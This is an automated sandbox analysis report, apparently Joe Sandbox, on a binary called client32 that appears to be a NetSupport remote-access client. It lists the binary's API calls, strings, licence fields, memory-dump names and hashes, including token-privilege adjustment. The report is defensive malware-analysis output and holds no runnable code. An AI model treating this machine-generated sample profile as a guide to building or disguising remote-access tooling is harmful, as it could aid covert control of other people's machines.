SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1111CC97
SystemParametersInfoA.USER32(00001016,00000000,0201E24C,00000000), ref: 1111CCAF
SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1111CCF5
SystemParametersInfoA.USER32(00001024,00000000,0201E250,00000000), ref: 1111CD0D
SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1111CDBF
SystemParametersInfoA.USER32(00001008,00000000,0201E258,00000000), ref: 1111CDD7
SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1111CE1A
SystemParametersInfoA.USER32(0000004A,00000000,0201E25C,00000000), ref: 1111CE2F
SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1111CAC1

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Strings

EnableMenuAnimation, xrefs: 1111CA91
ListviewAlphaSelect, xrefs: 1111CED8, 1111CEF3
ListviewWatermark, xrefs: 1111CFA0, 1111CFBB
EnableDragFullWindows, xrefs: 1111C9B8
SmoothScroll, xrefs: 1111CD4E, 1111CD6D, 1111CE6E, 1111CE89
EnableLVAlphaSelect, xrefs: 1111CEAF
EnableAnimation, xrefs: 1111CA2D
ListviewShadow, xrefs: 1111D004, 1111D024
EnableTVSmoothScroll, xrefs: 1111CD23
EnableCBAnimation, xrefs: 1111CAEF
EnableLBSmoothScroll, xrefs: 1111CB4D
EnableShadowCursor, xrefs: 1111CBAB
EnableTBAnimations, xrefs: 1111CF13
EnableLVWatermark, xrefs: 1111CF77
EnableFontSmoothing, xrefs: 1111CDED
EnableGradientCaptions, xrefs: 1111CD8F
TaskbarAnimations, xrefs: 1111CF3C, 1111CF57
EnableIESmoothScroll, xrefs: 1111CE45
EnableTTAnimation, xrefs: 1111CC67
EnableLVShadow, xrefs: 1111CFDB
EnableDropShadow, xrefs: 1111CCC5
EnableSelectionFade, xrefs: 1111CC09

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$InfoParameters$Metrics__wcstoi64
String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
API String ID: 3799663137-3751266815
Opcode ID: 7afb75842df2fa02927a322bd8ba874c8cab00f1a92636f1ff989c1c2fd4013b
Instruction ID: bf678e33c67380cbbf5bb6d1fd1adca19844daef576a9ba588db8e9803c6ea1e
Opcode Fuzzy Hash: 7afb75842df2fa02927a322bd8ba874c8cab00f1a92636f1ff989c1c2fd4013b
Instruction Fuzzy Hash: 2612A631600B42AAF720CF76CE44FABFBB5EB84B44F40442CA5469E5C8DAB4F441C799

Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5

_fgets.LIBCMT ref: 110628E2
_strpbrk.LIBCMT ref: 11062949
_fgets.LIBCMT ref: 11062A4C
_strpbrk.LIBCMT ref: 11062AC3
__wcstoui64.LIBCMT ref: 11062ADC
_fgets.LIBCMT ref: 11062B55
_strpbrk.LIBCMT ref: 11062B7B

Strings

_License, xrefs: 11062E76, 11062F34, 11062F4E, 110630D6, 11063140, 1106315B, 11063177, 11063271, 11063490, 11063578
?expirY, xrefs: 11063288
enforce, xrefs: 11062C56
_include, xrefs: 11062CE9
Client, xrefs: 11062D82, 11062DC4
ACM, xrefs: 110631B7
defaults, xrefs: 11062C36
Expired, xrefs: 1106348B
_version, xrefs: 11062F49
cd_install, xrefs: 1106313B
licensee, xrefs: 11063573
shrink_wrap, xrefs: 11063156
/- , xrefs: 1106331E, 11063351, 11063384
expiry, xrefs: 11063250
inactive, xrefs: 110630D1
%s.%04d.%s, xrefs: 11062DC9
_checksum, xrefs: 11062F2F
?starT, xrefs: 11063291, 1106329D
%c%04d%s, xrefs: 11062CA4
start, xrefs: 11063259, 11063270
product, xrefs: 11063172

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: fb06b02e58a3ad807d677c23ae840841415c87d799d4b15b11cd27735a5ccb1e
Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
Opcode Fuzzy Hash: fb06b02e58a3ad807d677c23ae840841415c87d799d4b15b11cd27735a5ccb1e
Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32(B24479DC), ref: 11139F07
IsWindow.USER32(0001033C), ref: 11139F65
IsWindowVisible.USER32(0001033C), ref: 11139F73
IsWindowVisible.USER32(0001033C), ref: 11139FAB
GetForegroundWindow.USER32 ref: 11139FC6
EnableWindow.USER32(0001033C,00000000), ref: 11139FE0
EnableWindow.USER32(0001033C,00000001), ref: 11139FFC
SetForegroundWindow.USER32(00000000), ref: 1113A00B
FindWindowA.USER32 ref: 1113A049
IsWindowVisible.USER32(00000000), ref: 1113A058
IsWindowVisible.USER32(0001033C), ref: 1113A088
IsIconic.USER32(0001033C), ref: 1113A095
GetForegroundWindow.USER32 ref: 1113A09F

Part of subcall function 11132120: ShowWindow.USER32(0001033C,00000000), ref: 11132144

Part of subcall function 11132120: ShowWindow.USER32(0001033C,11139EA2), ref: 11132156

SetForegroundWindow.USER32(00000000), ref: 1113A0C5
EnableWindow.USER32(0001033C,00000001), ref: 1113A0D4
GetLastError.KERNEL32 ref: 1113A193
GetLastError.KERNEL32 ref: 1113A20B
GetTickCount.KERNEL32 ref: 1113A4B8
GetTickCount.KERNEL32 ref: 1113A4D9

Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 110261A8

FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574

Strings

disableRunplugin, xrefs: 1113A118
Client, xrefs: 11139F99, 1113A11D, 1113A47B
HideWhenIdle, xrefs: 11139F94
NeedsReinstall, xrefs: 1113A476
ShowNeedsReinstall in 15, user=%s, xrefs: 1113A4AB
Shell_TrayWnd, xrefs: 1113A044
Reactivate main window, xrefs: 11139FB9
MainWnd = %08x, visible %d, valid %d, xrefs: 11139F7D
Audio, xrefs: 1113A295
File <%s> doesnt exist, e=%d, xrefs: 1113A197, 1113A20F
HookDirectSound, xrefs: 1113A290

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
API String ID: 2511061093-2542869446
Opcode ID: 57c8f6d5fc209948f85bb8005e31a54a668fb70e88704be28680b1ba6f91acda
Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
Opcode Fuzzy Hash: 57c8f6d5fc209948f85bb8005e31a54a668fb70e88704be28680b1ba6f91acda
Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278
libraryloadertimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,B24479DC), ref: 1113489E
LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
GetCurrentProcess.KERNEL32 ref: 11134937
GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
SetLastError.KERNEL32(00000078), ref: 11134978
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
SetLastError.KERNEL32(00000078), ref: 111349D9
SetLastError.KERNEL32(00000078), ref: 111349E6
GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
SetLastError.KERNEL32(00000078), ref: 11134A11
FreeLibrary.KERNEL32(?), ref: 11134B7B
FreeLibrary.KERNEL32(?), ref: 11134B88
FreeLibrary.KERNEL32(?), ref: 11134B92

Strings

_debug, xrefs: 11134882
Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB, xrefs: 11134A83
Client, xrefs: 11134AD1, 11134AFC, 11134B23, 11134B4A
GetGuiResources, xrefs: 1113498E, 111349B6
RestartGdiObj, xrefs: 11134B1E
RestartHandles, xrefs: 11134AF7
psapi.dll, xrefs: 111348D3
CheckLeaks, xrefs: 1113487D
RestartMB, xrefs: 11134ACC
RestartUserObj, xrefs: 11134B45
GetProcessMemoryInfo, xrefs: 111349F2
Date=%04d-%02d-%02d, xrefs: 111348BB
GetProcessHandleCount, xrefs: 1113495B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
API String ID: 263027137-1001504656
Opcode ID: 20c67bae0dcdf1604e8e4aa4e2af560c7cbaff05759c4426ccd2903a3aa2ec31
Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
Opcode Fuzzy Hash: 20c67bae0dcdf1604e8e4aa4e2af560c7cbaff05759c4426ccd2903a3aa2ec31
Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55

Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 111168D5
CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000), ref: 111168EF
LoadLibraryA.KERNEL32(SHELL32.DLL), ref: 11116914
GetProcAddress.KERNEL32(00000000,SHGetSettings,?,00000000,Client,silent,00000000,00000000), ref: 11116926
SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
CoUninitialize.OLE32 ref: 111169E1

Strings

SHELL32.DLL, xrefs: 11116905
SHGetSettings, xrefs: 11116920

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
String ID: SHELL32.DLL$SHGetSettings
API String ID: 4195908086-2348320231
Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61

Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4

_memset.LIBCMT ref: 11146055
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
FreeLibrary.KERNEL32(00000000), ref: 111460BF
GetSystemDefaultLangID.KERNEL32 ref: 111460CA

Strings

GetUserDefaultUILanguage, xrefs: 111460A1
kernel32.dll, xrefs: 11146080

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51

Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110737B0
_memset.LIBCMT ref: 11073929

Strings

_License, xrefs: 11073771
serial_no, xrefs: 1107376C
NBCTL32.DLL, xrefs: 11073865

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: NBCTL32.DLL$_License$serial_no
API String ID: 2102423945-35127696
Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90

Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 110317A4

Strings

Client32, xrefs: 11031784
NSMWClass, xrefs: 110317AF
NSMWClass, xrefs: 110317C3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID: Client32$NSMWClass$NSMWClass
API String ID: 3192549508-611217420
Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99

Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,004DD400,111EFB64,?,00000001,00000001), ref: 1109EDB0
EqualSid.ADVAPI32(?,004DD400,?,00000001,00000001), ref: 1109EDC3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken$AllocateEqualInitialize
String ID:
API String ID: 1878589025-0
Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791

Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,B24479DC,00080000,00000000,?), ref: 1109D88D
OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

